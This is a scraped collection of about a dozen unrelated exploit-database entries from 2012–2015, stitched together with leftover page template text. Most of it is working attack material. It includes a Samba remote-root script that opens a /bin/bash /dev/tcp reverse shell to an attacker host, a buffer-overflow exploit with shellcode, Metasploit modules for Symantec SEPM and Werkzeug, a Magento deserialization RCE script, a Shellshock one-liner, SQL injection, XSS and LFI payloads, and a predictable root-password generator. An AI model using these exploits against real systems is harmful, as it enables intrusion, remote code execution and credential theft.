******************************************************************************************** # Exploit Title: FTP Commander 'Costum Command' SEH Over-Write(Buffer Overflow). # Date: 8/17/2015 # Exploit Author: Un_N0n # Software Vendor : http://www.internet-soft.com/ # Software Link: http://www.internet-soft.com/ftpcomm.htm # Version: 8.02 # Tested on: Windows 7 x32(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- open 'ftpcomm.exe'. 2- Goto FTP - Server > Costum Command. 3- Below the SERVER LIST a input-box will appear, enter the contents of the crash.txt into it, then press Do it!. 4- Software will crash saying 'Access Violation at address XXXXXXXX......'. This is basic SEH Over-write, i have tried to make a working exploit on WIN 7 x32 but no luck since this- program does not have its own DLLs and using Windows DLLs is not a good idea b/c SAFESEH, have tried other techniques but the final exploit seems to be un-stable. [Code to produce crash.txt]: junk = "A"*6000 file = open("crash.txt",'w') file.write(junk) file.close() The following details are for those who would like to develop a working exploit for this software: OFFSET: 4112 + BBBB[NSEH] + CCCC[SEH] ... Hint: ~You can try loading the address from outside the address range of loaded modules.~ ;) *****************************************************************************************************************************
HireHackking

Cisco Unified Communications Manager - Multiple Vulnerabilities

HACKER · %s · %s

Vantage Point Security Advisory 2015-001 ======================================== Title: Cisco Unified Communications Manager Multiple Vulnerabilities Vendor: Cisco Vendor URL: http://www.cisco.com/ Versions affected: <9.2, <10.5.2, <11.0.1. Severity: Low to medium Vendor notified: Yes Reported: Oct. 2014 Public release: Aug. 13th, 2015 Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg> Summary: -------- Cisco Unified Communications Manager (CUCM) offers services such as session management, voice, video, messaging, mobility, and web conferencing. During the last year, Vantage Point Security has reported four security issues to Cisco as listed below. 1. Shellshock command injection -------------------------------- Authenticated users of CUCM can access limited functionality via the web interface and Cisco console (SSH on port 22). Because the SSH server is configured to process several environment variables from the client and a vulnerable version of bash is used, it is possible to exploit command injection via specially crafted environment variables (CVE-2014-6271 a.k.a. shellshock). This allows an attacker to spawn a shell running as the user "admin". Several environment variables can be used to exploit the issue. Example: $ LC_PAPER="() { x;};/bin/sh" ssh Administrator@examplecucm.com 2. Local File Inclusion ----------------------- The application allows users to view the contents of any locally accessible files on the web server through a vulnerability known as LFI (Local File Inclusion). LFI vulnerabilities are commonly used to download application source code, configuration files and files containing sensitive information such as passwords. Exploiting this issue requires a valid user account. https://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml 3. Unauthenticated access to ping command ----------------------------------------- The pingExecute servlet allows unauthenticated users to execute pings to arbitrary IP addresses. This could be used by an attacker to enumerate the internal network. The following URL triggers a ping of the host 10.0.0.1: https://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false 4. Magic session ID allows unauthenticated access to SOAP calls --------------------------------------------------------------- Authentication for some methods in the EPAS SOAP interface can be bypassed by using a hardcoded session ID. The methods "GetUserLoginInfoHandler" and "GetLoggedinXMPPUserHandler" are affected. Fix Information: ---------------- Upgrade to CUCM version 9.2, 10.5.2 or 11.0.1. References: ----------- https://tools.cisco.com/quickview/bug/CSCus88031 https://tools.cisco.com/quickview/bug/CSCur49414 https://tools.cisco.com/quickview/bug/CSCum05290 http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash http://tools.cisco.com/security/center/viewAlert.x?alertId=37111 Timeline: --------- 2014/10: Issues reported to Cisco; 2015/07: Confirm that all issues have been fixed. About Vantage Point Security: -------------------- Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. https://www.vantagepoint.sg/ office[at]vantagepoint[dot]sg
HireHackking
source: https://www.securityfocus.com/bid/55605/info Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Purity 1.3 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script> The "ContactName" ,"email" ,"subject" ,"comments", variables are not properly sanitized before being used Exploit: POST /contact/ HTTP/1.0 Content-Length: 82 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: exploit-masters.com Content-Type: application/x-www-form-urlencoded Referer: http://www.example.com/wordpress/contact/ contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=
HireHackking

WordPress Plugin MF Gig Calendar - Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55622/info The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected. GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1
HireHackking

YCommerce - Multiple SQL Injections

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55653/info YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Proof of Concept - YCommerce Reseller ------------------------------------- GET Param "cPath" - [Number of columns may vary] /store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- /store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- /store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- GET Param "news_id" - [Number of columns may vary] /store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- Proof of Concept - YCommerce Pro -------------------------------- GET Param "enterprise_id" - [Number of columns may vary] /store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61 GET Param "news_id" - [Number of columns may vary] /store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
HireHackking

Samba 3.5.11/3.6.3 - Remote Code Execution

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55655/info Samba is prone to an unspecified remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a denial-of-service condition. #!/usr/bin/python # # finding targets 4 31337z: # gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1' # -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell # found by eax samba 0day godz (loljk) from binascii import hexlify, unhexlify import socket import threading import SocketServer import sys import os import time import struct targets = [ { "name" : "samba_3.6.3-debian6", "chunk_offset" : 0x9148, "system_libc_offset" : 0xb6d003c0 }, { "name" : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)", "chunk_offset" : 4560, "system_libc_offset" : 0xb20 }, { "name" : "target_finder (hardcode correct system addr)", "chunk_offset" : 0, "system_libc_offset" : 0xb6d1a3c0, "finder": True } ] do_brute = True rs = 1024 FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) def dump(src, length=32): result=[] for i in xrange(0, len(src), length): s = src[i:i+length] hexa = ' '.join(["%02x"%ord(x) for x in s]) printable = s.translate(FILTER) result.append("%04x %-*s %s\n" % (i, length*3, hexa, printable)) return ''.join(result) sploitshake = [ # HELLO "8100004420434b4644454e4543464445" + \ "46464346474546464343414341434143" + \ "41434143410020454745424644464545" + \ "43455046494341434143414341434143" + \ "4143414341414100", # NTLM_NEGOT "0000002fff534d427200000000000000" + \ "00000000000000000000000000001d14" + \ "00000000000c00024e54204c4d20302e" + \ "313200", # SESSION_SETUP "0000004bff534d427300000000080000" + \ "000000000000000000000000ffff1d14" + \ "000000000dff000000ffff02001d1499" + \ "1f00000000000000000000010000000e" + \ "000000706f736978007079736d6200", # TREE_CONNECT "00000044ff534d427500000000080000" + \ "000000000000000000000000ffff1d14" + \ "6400000004ff00000000000100190000" + \ "5c5c2a534d425345525645525c495043" + \ "24003f3f3f3f3f00", # NT_CREATE "00000059ff534d42a200000000180100" + \ "00000000000000000000000001001d14" + \ "6400000018ff00000000050016000000" + \ "000000009f0102000000000000000000" + \ "00000000030000000100000040000000" + \ "020000000306005c73616d7200" ] pwnsauce = { 'smb_bind': \ "00000092ff534d422500000000000100" + \ "00000000000000000000000001001d14" + \ "6400000010000048000004e0ff000000" + \ "0000000000000000004a0048004a0002" + \ "002600babe4f005c504950455c000500" + \ "0b03100000004800000001000000b810" + \ "b8100000000001000000000001007857" + \ "34123412cdabef000123456789ab0000" + \ "0000045d888aeb1cc9119fe808002b10" + \ "486002000000", 'data_chunk': \ "000010efff534d422f00000000180000" + \ "00000000000000000000000001001d14" + \ "640000000eff000000babe00000000ff" + \ "0000000800b0100000b0103f00000000" + \ "00b0100500000110000000b010000001" + \ "0000009810000000000800", 'final_chunk': \ "000009a3ff534d422f00000000180000" + \ "00000000000000000000000001001d14" + \ "640000000eff000000babe00000000ff" + \ "00000008006409000064093f00000000" + \ "00640905000002100000006409000001" + \ "0000004c09000000000800" } def exploit(host, port, cbhost, cbport, target): global sploitshake, pwnsauce chunk_size = 4248 target_tcp = (host, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target_tcp) n = 0 for pkt in sploitshake: s.send(unhexlify(pkt)) pkt_res = s.recv(rs) n = n+1 fid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) s.send(unhexlify(pwnsauce['smb_bind'].replace("babe", fid))) pkt_res = s.recv(rs) buf = "X"*20 # policy handle level = 2 #LSA_POLICY_INFO_AUDIT_EVENTS buf+=struct.pack('<H',level) # level buf+=struct.pack('<H',level)# level2 buf+=struct.pack('<L',1)#auditing_mode buf+=struct.pack('<L',1)#ptr buf+=struct.pack('<L',100000) # r->count buf+=struct.pack('<L',20) # array_size buf+=struct.pack('<L',0) buf+=struct.pack('<L',100) buf += ("A" * target['chunk_offset']) buf+=struct.pack("I", 0); buf+=struct.pack("I", target['system_libc_offset']); buf+=struct.pack("I", 0); buf+=struct.pack("I", target['system_libc_offset']); buf+=struct.pack("I", 0xe8150c70); buf+="AAAABBBB" cmd = ";;;;/bin/bash -c '/bin/bash 0</dev/tcp/"+cbhost+"/"+cbport+" 1>&0 2>&0' &\x00" tmp = cmd*(816/len(cmd)) tmp += "\x00"*(816-len(tmp)) buf+=tmp buf+="A"*(37192-target['chunk_offset']) buf+='z'*(100000 - (28000 + 10000)) buf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] n=0 for chunk in buf_chunks: if len(chunk) != chunk_size: #print "LAST CHUNK #%d" % n bb = unhexlify(pwnsauce['final_chunk'].replace("babe", fid)) + chunk s.send(bb) else: #print "CHUNK #%d" % n bb = unhexlify(pwnsauce['data_chunk'].replace("babe", fid)) + chunk s.send(bb) retbuf = s.recv(rs) n=n+1 s.close() class connectback_shell(SocketServer.BaseRequestHandler): def handle(self): global do_brute print "\n[!] connectback shell from %s" % self.client_address[0] do_brute = False s = self.request import termios, tty, select, os old_settings = termios.tcgetattr(0) try: tty.setcbreak(0) c = True while c: for i in select.select([0, s.fileno()], [], [], 0)[0]: c = os.read(i, 1024) if c: if i == 0: os.write(1, c) os.write(s.fileno() if i == 0 else 1, c) except KeyboardInterrupt: pass finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) return class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if len(sys.argv) != 6: print "\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n" print " usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0]) print " targets:" i = 0 for target in targets: print " %02d) %s" % (i, target['name']) i = i+1 print "" sys.exit(-1) target = targets[int(sys.argv[5])] server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() while do_brute == True: sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset'])) sys.stdout.flush() exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) if "finder" in target: target['chunk_offset'] += 4 else: target['system_libc_offset'] += 0x1000 if "finder" in target: print \ "{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \ "system_libc_offset = 0x%03x" % \ (target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) while 1: time.sleep(999) server.shutdown()
HireHackking

CoSoSys Endpoint Protector - Predictable Password Generation

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55570/info CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability. Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances. CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected. function Get-EPPPassword { <# .Synopsis Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers. Author: Chris Campbell (@obscuresec) License: BSD 3-Clause .Description Get-EPPPassword Timeline: discovered 3 Mar 2012 reported to vendor 12 Jun 2012 reported to US-CERT 15 Jul 2012 released 17 Sep 2012 .Example Get-EPPPassword -Serial 123456789 .Link http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html #> Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial) #function to calculate sums from serial number function GetSerialSum { if ($Serial.Length -ne 9) { Return "EPP Serial Number is 9 digits" } else { #convert $serial to an array of integers [int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"} } foreach ($Number in $SerialArray) { $Sum += $Number } Write-Output $Sum } #function to calculate epproot password function GetPassword { Write-Output "eroot!00$Sums`RO" } $Sums = GetSerialSum GetPassword } Get-EPPPassword -Serial 135792468
HireHackking

TAGWORX.CMS - 'cid' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/55586/info TAGWORX.CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/gallery.php?cid=124'&pid=124 http://www.example.com/gallery.php?cat_id=17&cid='&pid=&img=1 http://www.example.com/gallery.php?cid=124'&pid=124
HireHackking
#!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow # Version: 5.6 # Date: 2015-08-17 # Author: Tracy Turben (tracyturben@gmail.com) # Software Link: http://www.efssoft.com/ # Tested on: Win7x32-EN # Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) from struct import pack import socket,sys import os host="192.168.1.15" port=80 junk0 = "\x90" * 80 # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 280 ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll] # Since 0x00 would break the exploit needs to be crafted on the stack crafted_jmp_esp=pack('<L',0xA44162FB) test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll] kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll] nopsled="\x90" * 20 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1\r\n" buf+="User-Agent: Mozilla/4.0\r\n" buf+="Host:" + host + ":" + str(port) + "\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buf+="Accept-Language: en-us\r\n" buf+="Accept-Encoding: gzip, deflate\r\n" buf+="Referer: http://" + host + "/\r\n" buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n" buf+="Conection: Keep-Alive\r\n\r\n" print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond\n" sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" s.close()
HireHackking
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', #discovery 'bperry' # metasploit module ], 'References' => [ ['CVE', '2015-1486'], ['CVE', '2015-1487'], ['CVE', '2015-1489'], ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html'] ], 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true } } ], ], 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8443), OptString.new('TARGETURI', [true, 'The path of the web application', '/']), ], self.class) end def exploit meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) print_status("#{peer} - Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_post' => { 'ActionType' => 'ResetPassword', 'UserID' => 'admin', 'Domain' => '' } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way") end cookie = res.get_cookies if cookie.nil? || cookie.empty? fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie") end exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe", 'KnownHosts' => '.' }, 'data' => payload.encoded_exe, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") print_status("#{peer} - Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp", 'KnownHosts' => '.' }, 'data' => exec, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") print_status("#{peer} - Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) end end
HireHackking

Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

HACKER · %s · %s

#!/usr/bin/python # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE # Google Dork: "Powered by Magento" # Date: 08/18/2015 # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com # Vendor Homepage: http://magento.com/ # Software Link: https://www.magentocommerce.com/download # Version: 1.9.0.1 and below # Tested on: Ubuntu 15 # CVE : none from hashlib import md5 import sys import re import base64 import mechanize def usage(): print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\"" sys.exit() if len(sys.argv) != 3: usage() # Command-line args target = sys.argv[1] arg = sys.argv[2] # Config. username = '' password = '' php_function = 'system' # Note: we can only pass 1 argument to the function install_date = 'Sat, 15 Nov 2014 20:27:57 +0000' # This needs to be the exact date from /app/etc/local.xml # POP chain to pivot into call_user_exec payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \ '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \ 'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \ 'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \ '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \ ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function, len(arg), arg) # Setup the mechanize browser and options br = mechanize.Browser() #br.set_proxies({"http": "localhost:8080"}) br.set_handle_robots(False) request = br.open(target) br.select_form(nr=0) br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control. br.form.fixup() br['login[username]'] = username br['login[password]'] = password br.method = "POST" request = br.submit() content = request.read() url = re.search("ajaxBlockUrl = \'(.*)\'", content) url = url.group(1) key = re.search("var FORM_KEY = '(.*)'", content) key = key.group(1) request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key) tunnel = re.search("src=\"(.*)\?ga=", request.read()) tunnel = tunnel.group(1) payload = base64.b64encode(payload) gh = md5(payload + install_date).hexdigest() exploit = tunnel + '?ga=' + payload + '&h=' + gh try: request = br.open(exploit) except (mechanize.HTTPError, mechanize.URLError) as e: print e.read()
HireHackking

Werkzeug - Debug Shell Command Execution (Metasploit)

HACKER · %s · %s

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Werkzeug Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips passed testing. Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian }, 'Author' => 'h00die <mike[at]shorebreaksecurity.com>', 'References' => [ ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] ], 'License' => MSF_LICENSE, 'Platform' => ['python'], 'Targets' => [[ 'werkzeug 0.10 and older', {}]], 'Arch' => ARCH_PYTHON, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'URI to the console', '/console']) ], self.class ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']) ) # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67 if res && res.body =~ /Werkzeug powered traceback interpreter/ return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def exploit # first we need to get the SECRET code res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']) ) if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/ secret = $1 vprint_status("Secret Code: #{secret}") send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']), 'vars_get' => { '__debugger__' => 'yes', 'cmd' => payload.encoded, 'frm' => '0', 's' => secret } ) else print_error('Secret code not detected.') end end end